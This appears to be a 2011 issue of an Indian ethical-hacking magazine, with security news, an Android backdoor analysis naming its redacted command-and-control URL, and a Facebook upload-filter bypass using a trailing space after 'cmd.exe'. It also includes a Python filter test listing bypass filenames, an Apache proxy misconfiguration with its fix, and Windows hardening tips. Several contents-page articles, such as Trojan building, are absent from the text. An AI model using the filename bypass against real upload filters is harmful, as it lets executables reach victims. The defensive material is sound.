
CiPHER

November 11

Amiable: displaying a friendly and pleasant manner. We here at Amiable are of a friendly and enthusiastic spirit. Amiable is all about reducing the monopoly on knowledge and sharing it with everyone. Every day, literally thousands of talented, hard-working folks out there gain new insight from their work, come up with brilliant ideas and then share their experience with us. Amiable aims to lay a strong underpinning for the technical development of our country by developing an active interest among youth in new technologies. Cipher Magazine delivers useful and innovative information to future Information Security personnel, Ethical Hackers and developers. Our aim with the magazine is to inform our readers about the latest trends and techniques in the Ethical Hacking World. We try to persuade you not with the quantity but with the quality of the information we present. The magazine is available free of cost on our website www.amiable.in. Our twelve issues in the year are devoted to the Ethical Hacking World and will show you the hacking world from its perspective. It is an excellent opportunity for readers to observe security trends on the market, and for companies to share their invaluable knowledge.

With the advent of technology, the world has become a better place to live in. Computers, mobiles, PDAs and robots are now everyday things. With the advancement in technology there has always been a security threat. The magazine has been launched keeping in mind the security threats faced daily in the virtual world. ID thefts, viruses, malware and security breaches have made the virtual world a deadly place. Sharing knowledge about security has been the theme of the magazine. We are a medium to share your knowledge with the world. Security Analysts who have been working in this field for years should come forward to help people. Researchers can publish their research and other security articles. Professionals can write on security threats over the internet. Bloggers can contribute their blogs. Students should come forward to publish their daily activities on security. I, at Amiable Technologies, would like to request contributions from Researchers, Professionals, Bloggers, Enthusiasts and Students.

SHARE YOUR KNOWLEDGE


Advertise
Aakash Mishra

ads@amiable.in

The content of the magazine should not be edited and/or used in blogs and websites; the content writers hold the copyright on it. The magazine can be printed and distributed without Amiable Technologies' prior permission. The magazine should not be uploaded on any site other than www.amiable.in. Defaulters will be punished heavily under Cyber Criminal Acts.

www.amiable.in

Bounty for Fresh White Hat ... 1
Student Arrested for Hacking Thai PM's Account ... 2
Android Malware Works on Remote Commands from Encrypted Blog ... 3
Apache releases Security Advisory following Discovery of Backdoor threat by Context Researchers ... 4
Computer Virus Hits U.S. Drone Fleet ... 5
18 Child Porn Websites Shut Down ... 5
Sony Ransacked in Huge Brute-Force Attack ... 6
Sesame Street Hacked ... 6
Miley Cyrus Needs A Lesson ... 7
Google Teams Up with Citizens Advice Bureau ... 7
Duqu: Son of Stuxnet ... 8
Bug in Flash Player: Mac Webcam Spying ... 9
Hackers Leak Citigroup CEO's Personal Data ... 9
Anonymous Hackers Shut Down Child Porn Website ... 10
Microsoft's YouTube Channel Hacked ... 11
Anonymous DDoS Oakland Police Site After Violence ... 12
China may have Hacked US Satellites ... 13
FB's EXE Attachment Vulnerability ... 13
Kinect Challenge for Malcon 2011 has been Completed by Indian Security Researcher 'Shantanu Gawde' ... 14
Facebook Ticker is Exposing Your Information ... 15
India Shuts Down Server in Duqu Virus Investigation ... 16
Browser Hijacking ... 17
Password File through FTP ... 19
Bypass BIOS Passwords ... 20
TCP Wrappers ... 23
Hack an Ethernet ADSL Router ... 25
SQL Injection ... 26
How to Hide the Partitions? ... 29
Ultimate Google Search Tips ... 29
Eject your drives in and out infinitely ... 35
Making a Trojan Virus in ProRat v1.9 ... 35

November 2011

Bounty for Fresh White Hat


Source: http://www.computerworlduk.com

NSS Labs is sweetening the pot for its ExploitHub marketplace by offering rewards to security gurus who can write working exploits for a dozen "high-value" vulnerabilities. The company, which has set aside $4,400 in reward money, plans to give $100 to $500 to the first people to submit a working exploit for each of the vulnerabilities. Ten of the vulnerabilities concern Microsoft's Internet Explorer browser and two were found in Adobe's Flash multimedia program. The exploits must be client-side remote exploits that can result in code execution. Proof-of-concept code and denial-of-service conditions do not qualify. NSS Labs will pay the developer with American Express gift cards. Residents of countries against which the US has a standing embargo are not allowed to participate. NSS Labs said that those who win can then sell their exploits on ExploitHub, a marketplace the company set up for penetration testers to acquire exploits to test against their own infrastructure. ExploitHub was set up to help with the development of penetration testing tools and to assist computer security researchers. Those who write the winning exploits may then sell their code on ExploitHub, with NSS Labs taking a 30% commission. Penetration testers can also make requests via the marketplace for exploits for specific vulnerabilities. Those who want to buy exploits are vetted by NSS Labs to ensure the marketplace is not abused.


Student Arrested for Hacking Thai PM's Account

Source: http://nakedsecurity.sophos.com

Thai authorities have arrested a university student who reportedly confessed to hacking the Twitter account of the country's prime minister. Police say Ekkavit Tongdeeworakul, 22, turned himself in on Wednesday. They say he hijacked Prime Minister Yingluck Shinawatra's account on Sunday to post several tweets accusing her government of incompetence and cronyism. Ekkavit is a fourth-year architecture student at Bangkok's Chulalongkorn University. Information and Communication Technology Minister Anudith Nakornthap says Ekkavit is accused of violating the Computer Crime Act by illegally accessing computer data without authorisation and could face up to two years in prison if found guilty. Anudith said he preferred not to reveal how the account was hacked. Remember folks: just because you can access someone else's email, Facebook or Twitter account without the owner's permission doesn't ever mean it's an acceptable thing to do. In fact, it's breaking the law and could lead to you getting in a lot of trouble.


Android Malware Works on Remote Commands from Encrypted Blog

This is the first known Android malware that reads blog posts and interprets them as commands. It can also download and install additional applications, thereby further compromising the affected device. This malware gathers specific information from the infected device, connects to a malicious URL to send the gathered information, and retrieves an XML configuration file. To get a one-glance comprehensive view of the behavior of this Backdoor, refer to the Threat Diagram shown below.

Technical Details
File size: Varies
File type: APK
Initial samples received date: 27 Sep 2011

Arrival Details
This backdoor may be unknowingly downloaded by a user while visiting malicious websites. It may also be manually installed by a user.

NOTES: This malware requests the following permissions, which it could use to perform malicious routines:
Access network settings
Access the Internet
Control the vibrator
Disable Keylock
Make a Call
Read low-level log files
Read and write contacts
Restart applications
Wake the device
Write, read, receive, and send SMS

It gathers the following device information:
Build version
IMEI
IMSI
Manufacturer
Model
OS version
Package name of legitimate application
SDK version

It connects to the following URL to send the gathered information and retrieves an XML configuration file:
http://b4.{BLOCKED}r.co.cc:8080/jk.action={information}

The configuration file contains the settings of the malware, the package name to be downloaded, and the download URL. As of this writing the package that is installed is "com.sec.android.touchScreen.server", downloaded from the blog post at http://blog.{BLOCKED}.com.cn/s/blog_8440ab780100t0nf.html. The blog post contains encrypted messages that the malware interprets as its commands. It can also download other malicious applications from this blog post.

Solution
Minimum scan engine: 9.200
VSAPI OPR Pattern Version: 8.461.00
VSAPI OPR Pattern Release Date: 29 Sep 2011

Step 1: For Windows ME and XP users, before doing any scans, please make sure you disable System Restore to allow full scanning of your computer.
Step 2: Scan your computer with your Trend Micro product to delete files detected as ANDROIDOS_ANSERVER.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.

NOTES: Trend Micro Mobile Security Solution
Trend Micro has released an integrated solution for mobile devices, which provides automatic, real-time scanning to protect wireless devices against malicious code and viruses on the Web or hidden inside files. Download Trend Micro Mobile Security for Android.

Manual Removal Instructions
Step 1: Select Settings > Application > Manage Applications
Step 2: Select {Detected Application Name}, then click Uninstall

Apache releases Security Advisory following Discovery of Backdoor threat by Context Researchers

Source: http://www.contextis.com/news/

Apache released an advisory on Wednesday 5th October 2011 to all of its customers following the identification by Context's researchers of a new class of security vulnerability that could allow hackers to gain full internet access to internal or DMZ systems through insecurely configured reverse web proxies. Context alerted Apache to the weakness last month and has published a blog post detailing this new class of attack, which it believes is likely to affect other web servers and proxies. Reverse proxies are used to route external HTTP and HTTPS web requests to one of several internal web servers to access data and resources. Typical applications include load balancing, separating static from dynamic content, or presenting a single interface to a number of different web servers at different paths. While other proxies may suffer from the same vulnerability, the specific attack identified by Context researchers was based on an Apache web server using the mod_rewrite proxy function, which uses a rule-based rewriting engine to modify and rewrite web requests dynamically. When the web proxies had not been configured securely, Context was able to use an easy-to-obtain hacking tool to force a change in the request and reach internal or DMZ systems, including administration interfaces on firewalls, routers, web servers and databases. And if credentials on internal systems were weak, a full network compromise was possible, including uploading Trojan WAR files to a server. "This latest vulnerability presents a potential back door to sensitive internal or DMZ systems but is totally avoidable if the reverse proxies are properly configured," said Michael Jordon, Research and Development Manager at Context. "We have not investigated other web servers and proxies but it is reasonable to assume that the problem is more widespread."
Full details of the reverse proxy bypass vulnerability are also documented in the Context blog published today at: http://www.contextis.com/research/blog/reverseproxybypass/.
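As an added illustration (not taken from the Context advisory or from this article), the shape of mod_rewrite reverse-proxy rule that this class of misconfiguration concerns, beside the corrected rule; the internal hostname is a placeholder.

```apache
# Weak form: the captured request path is glued straight onto the hostname.
# Apache only guarantees that normal request paths begin with "/"; a request
# line whose path does not begin with "/" therefore lands in the authority part
# of the rewritten URL, and the proxy destination stops being the host the
# administrator wrote here. "internal.example.local" is a placeholder.
RewriteEngine On
RewriteRule ^(.*) http://internal.example.local$1 [P]

# Hardened form: anchor the pattern on the leading slash and put the slash
# back in the target, so the forwarded URL is always
# http://internal.example.local/<path> and the destination host is fixed.
RewriteEngine On
RewriteRule ^/(.*) http://internal.example.local/$1 [P]

# The [P] flag needs only mod_proxy's reverse-proxy support; forward proxying
# should stay disabled so the server cannot be used as an open relay.
ProxyRequests Off
```

The same check applies to any rewrite or ProxyPass target: the scheme and host must be literal, and anything taken from the request may only ever appear after a literal "/".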


Computer Virus Hits U.S. Drone Fleet

Source: www.wired.com

A computer virus has infected the cockpits of America's Predator and Reaper drones, logging pilots' every keystroke as they remotely fly missions over Afghanistan and other war zones. The virus, first detected nearly two weeks ago by the military's Host-Based Security System, has not prevented pilots at Creech Air Force Base in Nevada from flying their missions overseas. Nor have there been any confirmed incidents of classified information being lost or sent to an outside source. But the virus has resisted multiple efforts to remove it from Creech's computers, network security specialists say. And the infection underscores the ongoing security risks in what has become the U.S. military's most important weapons system. The Air Force declined to comment directly on the virus. "We generally do not discuss specific vulnerabilities, threats, or responses to our computer networks, since that helps people looking to exploit or attack our systems to refine their approach," says Lt. Col. Tadd Sholtis, a spokesman for Air Combat Command, which oversees the drones and all other Air Force tactical aircraft. "We invest a lot in protecting and monitoring our systems to counter threats and ensure security, which includes a comprehensive response to viruses, worms, and other malware we discover." However, insiders say that senior officers at Creech are being briefed daily on the virus. "It's getting a lot of attention," the source says. "But no one's panicking. Yet."

18 Child Porn Websites Shut Down

Source: http://www.fbi.gov/news

In another example of the increasingly international nature of crime, a man was recently indicted on federal charges of running 18 Chinese-language child pornography websites out of his apartment in Flushing, New York. The websites were being advertised to Chinese-speaking individuals in China, in the U.S., and in other countries. How it all started: in late 2010, the FBI, through our legal attaché office in Beijing, received information from Chinese officials about their investigation of a large-scale child pornography website housed on U.S. servers. And one of their main suspects, a Chinese-born man, was living in New York. So our New York office opened an investigation under our Innocent Images National Initiative and instituted an undercover operation. One concrete outcome of this partnership? The Ministry of Public Security sent its first Chinese officer to join the FBI's Innocent Images International Task Force and receive specialized training on such topics as legal principles, emerging trends and technologies, and investigative techniques. Once the fall 2011 training session is completed, the task force will number 100 officers in 43 countries. Since its launch in 2004, the task force has built an international network of Internet child sexual exploitation investigators who share intelligence and work joint operations across national borders. Exactly what's needed to combat the many child pornographers using the Internet to extend their nefarious reach around the globe.

Sony Ransacked in Huge Brute-Force Attack

93,000 Accounts Broken Into

Source: http://www.theregister.co.uk

Sony has warned users about a massive brute-force attack against PlayStation and Sony network accounts. The attack, which used password and user ID combinations from an unidentified third-party source, succeeded in compromising 60,000 PlayStation Network and 33,000 Sony Online Entertainment network accounts. These accounts have been locked and their passwords reset. Both the motive for the latest attack against Sony network users and the identity of the perpetrator(s) remain unclear. Sony shut down its PlayStation Network in April in the aftermath of a far more damaging hack attack. The service wasn't restored until a month later. Personal information on 77 million account-holders was exposed as a result of the April PlayStation hack. Details including names, addresses, passwords and purchase histories were exposed by the megahack. Sony was widely criticised for its handling of the incident, one of the biggest data breach incidents (by volume of records) in history.

Sesame Street Hacked, Porn Posted

Source: http://www.pcworld.com

The Sesame Street channel on YouTube, a popular stop on the Internet for preschool children, was attacked on Sunday by a hacker who deleted all videos from the channel, modified its design, and posted graphic porn to it. It took Google about 22 minutes to take down the offensive content, according to The Next Web. "YouTube's Community Guidelines prohibit graphic content," a YouTube representative told CNN. "As always, we remove inappropriate material as soon as we are made aware of it." Mredxwx's innocence was defended on one Internet forum. "This appears to have been a venge-hack," asserted "lasernut" on Reddit, a social news site. "Essentially framing this person as the culprit behind this... Someone apparently wants to grief that person." This isn't the first time a site affiliated with the Public Broadcasting System has been the target of hackers. In May, the PBS News Hour blog was hacked and a phony news story planted on it that rappers Tupac Shakur and Biggie Smalls were still alive and living in New Zealand.


Miley Cyrus Needs A Lesson

Source: http://crushable.com/entertainment

With celebrity phone hacker Christopher Chaney arrested, another hacker has reached out to TMZ to share how laughably easy it was for him to hack into Miley Cyrus' Gmail account. Here's a lesson in the Internet, Miley: don't use the name of your best friend (which the Internet knows) as your security question. First he tracked down her Gmail name; though he doesn't say what it is, I just did a quick Google search and came up with two possibilities through Yahoo! Answers already. Obviously that part won't take long. When he tried to log in, he got a security question: the name of one of Miley's girlfriends. All the hacker had to do was search for which girl Miley has been friends with the longest (could it have been Mandy, from their YouTube days?), and voila! At the same time, this is yet another sphere of their lives where celebs are obliged to have extra security. When every minute detail, from your childhood nickname to your various tattoos, is exhaustively documented on Wikipedia and in magazine interviews, you have to keep some facts secret so that no one else can find them. Basically, Google yourselves before you go inputting any of these personal details as security measures. There's always a chance that the hacker contacting TMZ is Chaney using another email address, but we can only hope he wouldn't be that stupid.

Google Teams Up with Citizens Advice Bureau

Source: http://www.telegraph.co.uk/technology/google

Google is to launch a campaign promoting online safety in association with the Citizens Advice Bureau (CAB). Using adverts in newspapers, on public transport and online, the two organisations will encourage users to adopt secure passwords, to log out of web browsers and computers when they've finished using them, and even to adopt more complex ways of signing into their email accounts, known as 'two-factor authentication'. It will also cover child protection and the use of 'cookies' in web browsers. The campaign will be the first that Google has ever run promoting something other than a product, such as its web browser Chrome. It will primarily be funded by the search giant, in consultation with the CAB. Google claimed the website and advertising campaign aim to empower users to tackle their online security concerns and make more informed decisions about their internet use. Anthony House, Google's Communications and Policy Manager, added that "Everyone wants to stay safe online, but many people aren't confident that they know how to."


Duqu: Son of Stuxnet

Source: mocana.com/blog

It had to happen: someone has released the next step toward the next-generation Stuxnet virus, although the target of this new virus is as yet unclear. According to Symantec, the new threat, dubbed Duqu because the code contains the string ~DQ, is a surveillance-based Trojan horse designed to relay information back to a command and control center. Duqu uses mock .jpg files along with other dummy files, all encrypted, to exfiltrate data. Unlike Stuxnet, which specifically damaged Siemens PCS 7 systems, Duqu appears only to be collecting information about the design of other industrial control systems. Duqu has an active lifetime of only about 36 days, but this is probably to limit its discovery. The Symantec report states that the threat "was written by the same authors, or those that have access to the Stuxnet source code, and appears to have been created after the last Stuxnet file we recovered." F-Secure's Mikko Hypponen tweeted that Duqu's kernel driver (JMINET7.SYS) "is so similar to Stuxnet's driver (MRXCLS.SYS) that our back-end systems actually thought it's Stuxnet." At this time Duqu does not propagate and has been released only within targeted industries, although Symantec admits it may also be elsewhere and not yet discovered. The original compile dates on some of the variants of Duqu analyzed so far suggest it may have existed as far back as November 3, 2010. Stuxnet compile dates were between June 2009 and March 2010 and therefore pre-date Duqu. Clues to Duqu's origin do exist. For example, it uses a digital certificate set to expire August 2, 2012, issued to a company in Taipei, Taiwan. F-Secure's Hypponen thinks the certificate might have been stolen from C-Media in Taiwan. Symantec says that certificate was revoked on October 14, 2011.


Bug in Flash Player: Mac Webcam Spying

Source: http://www.theregister.co.uk

Engineers on 20th Oct patched a hole in Adobe's ubiquitous Flash Player that allowed website operators to silently eavesdrop on visitors' webcam and microphone feeds without permission. To be attacked, visitors needed to do no more than visit a malicious website and click on a handful of buttons like the ones in this live demonstration. Without warning, the visitor's camera and microphone were activated and the video and audio intercepted. The attack closely resembled a separate Flash-based attack on webcams from 2008 using a class of exploit known as clickjacking. Shortly after security researchers Jeremiah Grossman and Robert "RSnake" Hansen documented clickjacking in 2008, Adobe patched Flash to blunt attacks that exploited the program to surreptitiously spy on the millions of people who use it. Engineers closed the hole by changing the behavior of the Flash security dialog box when it is set to be transparent. Aboukhadijeh was able to revive the attack by exploiting the settings manager, which, until Thursday's fix, still allowed important settings to be changed while it was in transparent mode. He said his demonstration worked only against Macs using Firefox or Safari, and that a CSS opacity bug prevented it from working on other operating systems and browsers. It wouldn't have been surprising if additional research had uncovered ways to make the attack more universal. Aboukhadijeh went on to say he went public after reporting the vulnerability to Adobe and getting no reply. "It's been a few weeks and I haven't heard anything from Adobe yet," he said. "I think it's worth sharing it with the world now, so that Adobe pays attention and fixes it more quickly."

Hackers Leak Citigroup CEO's Personal Data After Occupy Wall Street Arrests

Source: http://news.yahoo.com

In retaliation for the arrest of protesters who tried to close their Citibank accounts, hackers sympathetic to the Occupy Wall Street movement have released personal information about Citigroup Chief Executive Officer Vikram Pandit. Data including cell and office phone numbers, an email address, two home addresses, legal and financial information, and information about Pandit's family were all posted online by members of a hacker group known as CabinCr3w. The group affiliates itself with the loose-knit group Anonymous, which has a long history of high-profile hacks and data leaks. Anonymous members played a key role in promoting the original Occupy Wall Street protest, which began on September 17. A month later, the Occupy movement has spread to more than 900 cities around the world, primarily through the use of Twitter and other social media and Internet properties. Last week, Pandit said he would be happy to meet with Occupy Wall Street protesters, who blame the financial sector for the bad economy and oppose its influence on US politics, reports Businessweek. He said their complaints are "completely understandable."

Anonymous Hackers Shut Down Child Porn Website

Source: http://www.techradar.com/news/internet

The hacking group known as Anonymous has claimed responsibility for shutting down a website used to share pictures of child abuse. The group released a statement saying it has begun targeting over 40 websites responsible for posting and sharing the indecent images, the largest of which is "Lolita City". Anonymous says it has published the login details of the site's 1,500 members online after hacking into the hosting company, Freedom Hosting. It had previously contacted the host requesting that the offending content, totalling over 100GB, be removed. The request was ignored. The group, which spent much of 2011 targeting many of the tech world's most illustrious companies, also issued a warning to other hosting companies which enable child pornography to be shared. "Our demands are simple. Remove all child pornography content from your servers. Refuse to provide hosting services to any website dealing with child pornography," added the statement. "This statement is not just aimed at Freedom Hosting, but everyone on the internet. It does not matter who you are, if we find you to be hosting, promoting, or supporting child pornography, you will become a target." Anonymous says the site was accessible through the Tor network, which allows for complete online anonymity and defends internet users against surveillance. It is widely used for posting illegal materials, but also for circumventing widespread internet censorship in countries like China and Iran.


Microsoft's YouTube Channel Hacked

Source: http://nakedsecurity.sophos.com

Hackers have taken control of Microsoft's official YouTube channel, removed the company's videos and replaced them with ones of their own. It seems unlikely that the change to the YouTube channel is a bizarre publicity stunt by Microsoft. After all, what would be the sense in deleting its archive of past videos, many of which are embedded on third-party sites around the world? Although there are no details yet about how hackers managed to gain control of Microsoft's YouTube account, the obvious suspicion has to be that a Microsoft employee who had administrative rights over the channel was careless with their password. One YouTube user, however, has left a comment on one of the videos describing his theory on how Microsoft's YouTube account was compromised: "This is how he 'hacked' the channel: He legitimately made the account Microsoft when YouTube wasn't that big but the REAL Microsoft probably asked YouTube to disable it and give it to them. The flaw is that this account was probably still linked to this kid's email and Microsoft forgot to change it or whatever. So all this kid had to do was recover this account using his old email. Not that hard. That's probably how the other big channels got 'hacked'. Thumbs this up so people can see!" Regardless of how the hack occurred, it's embarrassing and inconvenient for Microsoft.


Anonymous DDoS Oakland Police Site After Violence

Cyber activists associated with Anonymous have targeted the Oakland Police Department (OPD) and other law enforcement agencies that participated in a controversial crackdown against Occupy Oakland protesters. A DDoS (Distributed Denial of Service) attack against the department's website, www.oaklandpolice.com, is underway, and the website is currently unreachable. AnonyOps tweeted: 'I'm amazed and proud of #occupyOakland protesters who stood defiant, peaceful in the face of lethal force by Oakland PD.' Police fired a number of tear gas canisters, concussion grenades, rubber bullets and non-lethal rounds at demonstrators on Tuesday night, drawing widespread condemnation for the use of heavy-handed tactics against unarmed civilians. The attack was first announced via Anonymous' AnonOps Twitter feed. "@Anon_Central: Admin/User/Password Dump of oaklandnet.com Problem Oakland authorities? F--- you! >>pastebin.com/S8VRwRxQ #Anonymous," read AnonOps' tweet. Reports of police violence against Oakland protesters re-emerged Tuesday on the movement's web site, occupyoakland.org. The web site published statements charging the U.S. police with numerous acts of brutality during a recent raid designed to evict protesters from their encampment. The most seriously injured victim was Scott Olsen, an Iraq War veteran, who suffered a fractured skull after being struck by a police projectile. His condition was upgraded to "fair" today, according to reports. According to the Pastebin document, Anonymous is offering a "no questions asked" $1,000 reward for information about the officer who threw the projectile at Olsen.

China may have Hacked US Satellites


Source: http://www.tgdaily.com/security-features

A US congressional commission has confirmed that hackers "interfered" with two government satellites between 2007 and 2008 via a Norwegian ground station. According to Bloomberg, the Chinese military is suspected of executing the digital intrusions, which targeted satellites used for earth climate and terrain observation. "Such interference poses numerous potential threats, particularly if achieved against satellites with more sensitive functions," reads a final draft report authored by the U.S.-China Economic and Security Review Commission. "Access to a satellite's controls could allow an attacker to damage or destroy the satellite. An attacker could also deny or degrade as well as forge or otherwise manipulate the satellite's transmission." Indeed, the Landsat-7 earth observation satellite system experienced 12 or more minutes of interference in October 2007 and July 2008, while hackers tapped into the Terra AM-1 earth observation satellite twice, for two minutes in June 2008 and nine minutes in October that year. Interestingly enough, the report doesn't actually accuse the Chinese government of sponsoring or executing the four attacks. However, it clearly states that the breaches are "consistent" with Beijing's military doctrine, which advocates disabling an enemy's space systems, and particularly "ground-based infrastructure, such as satellite control facilities." In a conflict, the Chinese would try to "compromise, disrupt, deny, degrade, deceive or destroy" US space and computer systems, the draft claims, an act which could "critically disrupt the military's ability to deploy and operate during a military contingency."

Facebook EXE Attachment Vulnerability Can Compromise Users' Security

Summary: When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered that subverts these security mechanisms. Note that you do NOT have to be friends with a user to send them a message with an attachment.

Description: When attaching an executable file, Facebook returns an error message stating: "Error Uploading: You cannot attach files of that type." When uploading a file attachment to Facebook, we captured the web browser's POST request being sent to the web server. Inside this POST request reads the line:

Content-Disposition: form-data; name=attachment; filename=cmd.exe

It was discovered that the variable 'filename' was being parsed to determine whether the file type is allowed or not. To subvert the security mechanism and allow an .exe file type, we modified the POST request by appending a space to our filename variable, so that it read filename=cmd.exe followed by a trailing space. This was enough to trick the parser and allow our executable file to be attached and sent in a message.

Impact: Could potentially allow an attacker to compromise a victim's computer system.

Credits: Discovered by Nathan Power, www.securitypentest.com
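The defect described above is a normalisation bug: the server compared the raw extension string, so a filename that differed from "cmd.exe" by one trailing space was no longer recognised as an executable. The snippet below is an added illustration written for this article, not Facebook's code or the researcher's: a naive filter of the kind the write-up describes sits beside a hardened one that normalises the name (base name only, whitespace and NUL stripped, lower-cased, every extension segment checked) and additionally refuses content that starts with the "MZ" executable header whatever it is called. It assumes the quoted filename="..." form that browsers send (the advisory shows it unquoted); the header values, block list and function names are constructed for the example.

```python
"""Added example (not from the advisory): naive vs hardened attachment filter."""
import re
import unicodedata

# Constructed block list; a real deployment would use an allow list instead.
BLOCKED_EXTENSIONS = {"exe", "com", "bat", "cmd", "scr", "pif", "msi", "vbs", "js"}

# Constructed Content-Disposition values, as a browser or a hand-edited client
# might send them inside a multipart POST body.
SAMPLE_HEADERS = [
    'form-data; name="attachment"; filename="report.pdf"',
    'form-data; name="attachment"; filename="cmd.exe"',
    'form-data; name="attachment"; filename="cmd.exe "',       # trailing space
    'form-data; name="attachment"; filename="CMD.EXE"',         # case variant
    'form-data; name="attachment"; filename="cmd.exe\t"',       # trailing tab
    'form-data; name="attachment"; filename="C:\\tools\\cmd.exe"',  # path prefix
]


def filename_from_disposition(header):
    """Pull the raw filename parameter out of a Content-Disposition value."""
    m = re.search(r'filename="([^"]*)"', header)
    return m.group(1) if m else ""


def naive_is_allowed(filename):
    """The kind of check the advisory describes: take the text after the last
    dot and compare it literally. 'cmd.exe ' yields the extension 'exe ', which
    is not in the block list, so the executable passes."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return ext not in BLOCKED_EXTENSIONS


def hardened_is_allowed(filename, first_bytes=b""):
    """Normalise before deciding, then also look at the content.

    - NFKC folds look-alike characters such as a non-breaking space.
    - Only the base name is considered, so a path prefix cannot hide it.
    - NULs are removed and surrounding whitespace stripped.
    - Every dotted segment after the first is checked, lower-cased.
    - Data beginning with the DOS/Windows 'MZ' header is refused regardless
      of name (first_bytes would be the start of the uploaded body)."""
    name = unicodedata.normalize("NFKC", filename)
    name = name.replace("\\", "/").rsplit("/", 1)[-1]
    name = name.replace("\x00", "").strip()
    parts = [p.strip().lower() for p in name.split(".")]
    if any(p in BLOCKED_EXTENSIONS for p in parts[1:]):
        return False
    if first_bytes[:2] == b"MZ":
        return False
    return True


def evaluate(headers=SAMPLE_HEADERS):
    """Return (naive_verdicts, hardened_verdicts) for the sample headers."""
    names = [filename_from_disposition(h) for h in headers]
    return ([naive_is_allowed(n) for n in names],
            [hardened_is_allowed(n) for n in names])


if __name__ == "__main__":
    for header, naive, hard in zip(SAMPLE_HEADERS, *evaluate()):
        print(f"{filename_from_disposition(header)!r:28} naive={naive!s:5} hardened={hard}")
```

Running the block shows the naive filter accepting three of the five executable variants (trailing space, upper case, trailing tab) while the hardened one rejects all of them and still admits the PDF. The content check matters because the name is attacker-controlled end to end; a server that can inspect the first bytes of the upload should not rely on the name alone.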

Kinect Challenge for MalCon 2011 has been Completed by Indian Security Researcher 'Shantanu Gawde'

Only 15 years old, Indian researcher 'Gawde' has created, for MalCon 2011, a malware that utilizes the Microsoft Kinect controller to secretly capture pictures and upload them to a Picasa account. With over 10 million devices sold to date, the Kinect holds the Guinness world record for the fastest selling consumer electronics device, and that is exactly the reason why the malware is a concern. In recent months, there have been a number of innovative Kinect hacks that make use of the Kinect using both open-source drivers and the Kinect SDK. The malware, code-named 'gawde' after its creator's name, works on Windows 7 to secretly capture pictures of the victim / surroundings from a connected Kinect device and uploads them to a Picasa account. Rajshekhar Murthy, Director at ISAC (Information Sharing and Analysis Center), a scientific non-profit body that holds the International Malware Conference, MalCon, said: "We believe that in coming years, a lot of Windows-based applications will be developed for Kinect and the device will gain further immense popularity and acceptance, and from the perspective of an attacker, such a popular device can be an exciting target for visual and audio intelligence. At MalCon research labs, we promote proactive security research and the malware utilizing Kinect is only a proof of concept." The Kinect malware 'gawde' goes a step further and even uses voice recognition to execute a program based on a keyword, without the knowledge of the victim. The malware proof of concept will be demonstrated at the upcoming MalCon 2011 in Mumbai, India.

Facebook Ticker is Exposing Your Information and Behavior Without Your Knowledge

Source: http://www.riceoweek.com

Nelson Novaes Neto, an independent Brazilian security and behaviour researcher, has analysed a privacy issue in the Facebook Ticker that allows any person to follow you without your knowledge or consent. He explains that this is not a code vulnerability; the whole issue is related to users' privacy. Nelson said on his blog: "This tool to monitor others began to run when Facebook introduced a new feature called Ticker. This new feature (Ticker) does not respect the privacy settings, and now comments (updates), added friends and likes can be seen by others (friends *) without your permission. * Do you really know whether a friend is a real profile or a fake cloned one?" Nelson gives a proof of concept with a very creative real-life scenario. Check out the live demonstration, where a short story explains the privacy issue (you can use any browser to play it).

Description: This is a scenario where your online behaviour can be exposed without your knowledge through the new Facebook tool called Ticker. I used four Facebook profiles to create this POC (proof of concept), in which a woman was cheating on her husband on Facebook.

Synopsis: A couple are both Facebook users, each with their own profile. One day the husband found his wife adding her ex-boyfriend as a friend and starting to talk to him. The husband became really angry and removed his wife's ex-boyfriend's profile. The wife also discovered that all her comments (updates), added likes and friends were available on her profile (Wall) and visible to all her friends. She then removed all the updates and blocked new updates from being published automatically on her profile (Wall). Thus her husband could no longer keep track of his wife's activity.

After Facebook launched this new tool called Ticker, a friend of the couple (a friend of both of them) saw that the wife's updates appeared in real time in the Ticker, and told the husband that his wife had again added the ex-boyfriend and was talking to him, writing on his posts and vice versa. The husband checked his wife's profile but found nothing there. His friend said that this new tool (Ticker) lets you see updates from anyone on your list of friends, as well as from users who have been tagged by your friends. What is happening? How is it that the husband could not see anything (updates) on his wife's profile, but his friend can see everything through this thing called Ticker?

The issue is now public because, according to Nelson, he reported this privacy issue to the Facebook Security team a few months ago and until now has not received any positive response from Facebook. He said: "Considering that I respect a code of ethics (one that protects society, the commonwealth and infrastructure), I think this goes completely against users' desires and is worth sharing with everyone."


India Shuts Down Server in Duqu Virus Investigation

Source: http://www.msnbc.msn.com

Indian authorities seized computer equipment from a data center in Mumbai as part of an investigation into the Duqu malicious software that some security experts warned could be the next big cyber threat. Two workers at a web-hosting company called Web Werks told Reuters that officials from India's Department of Information Technology last week took several hard drives and other components from a server that security firm Symantec Corp told them was communicating with computers infected with Duqu. "This one is challenging," said Marty Edwards, director of the U.S. Department of Homeland Security's Industrial Control Systems Cyber Emergency Response Team. "It's a very complex piece of software." An official in India's Department of Information Technology who investigates cyber attacks also declined to discuss the matter. "I am not able to comment on any investigations," said Gulshan Rai, director of the Indian Computer Emergency Response Team, or CERT-In. In March, hackers stole digital security keys from EMC Corp's RSA Security division that they later used to breach the networks of defense contractor Lockheed Martin Corp. Researchers said they are still trying to figure out what the next phase of Duqu attacks might be. "We are a little bit behind in the game," said Don Jackson, a director of the Dell SecureWorks Counter Threat Unit. "Knowing what these guys are doing, they are probably a step ahead."

Advertisement Here
Contact for space : ads@amiable.in

Browser Hijacking

Hackers and browser hijacking is one area of the Net that affects everyone at some stage. In addition to having third-party utilities such as SpyBot, anti-virus scanners and firewalls installed, there are some changes that can be made to Windows 2000/XP. Below are some details to make your system safer from hackers and hijackers. Some of these tips require editing of the Registry, so it is wise to either back up the registry and/or create a Restore Point.

1. Clearing the Page File at Shutdown: The Windows 2000/XP paging file (sometimes called the swap file) can contain sensitive information such as plaintext passwords. Someone capable of accessing your system could scan that file and find its information. You can force Windows to clear out this file. In the registry navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management and add or edit the DWORD ClearPageFileAtShutdown. Set it to 1. Note that when you do this, the system will take much longer to shut down: a system with a really big page file (1 GB or more) may take a minute or two longer.

